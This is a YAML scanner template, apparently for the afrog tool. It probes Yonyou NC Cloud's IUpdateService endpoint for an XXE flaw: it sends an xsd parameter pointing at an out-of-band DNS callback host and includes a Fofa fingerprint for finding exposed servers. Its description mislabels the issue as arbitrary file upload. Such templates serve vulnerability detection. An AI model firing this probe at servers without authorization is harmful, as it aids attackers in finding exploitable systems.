id: yonyou-nccloud-iupdateservice-xxe

info:
  name: 用友NC Cloud IUpdateService接口存在XXE漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    NC Cloud是用友推出的大型企业数字化平台。 用友网络科技股份有限公司NC Cloud存在任意文件上传漏洞，攻击者可利用该漏洞获取服务器控制权。该系统IUpdateService接口存在实体注入漏洞
    Fofa: icon_hash="1085941792"
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247485049&idx=1&sn=7a625025a84db9cf45edd31992458c41&chksm=974b8b7ea03c02685c2983a4cb6db054213f3e87a49268b1c7268f6d684792f91d88ca0cd5f2&scene=21#wechat_redirect
  tags: yonyou,nccloud,xxe
  created: 2024/01/16

set:
  oob: oob()
  oobDNS: oob.DNS
rules:
  r0:
    request:
      method: GET
      path: /uapws/service/nc.uap.oba.update.IUpdateService?xsd=http://{{oobDNS}}
    expression: oobcheck(oob, "dns", 3)
expression: r0()
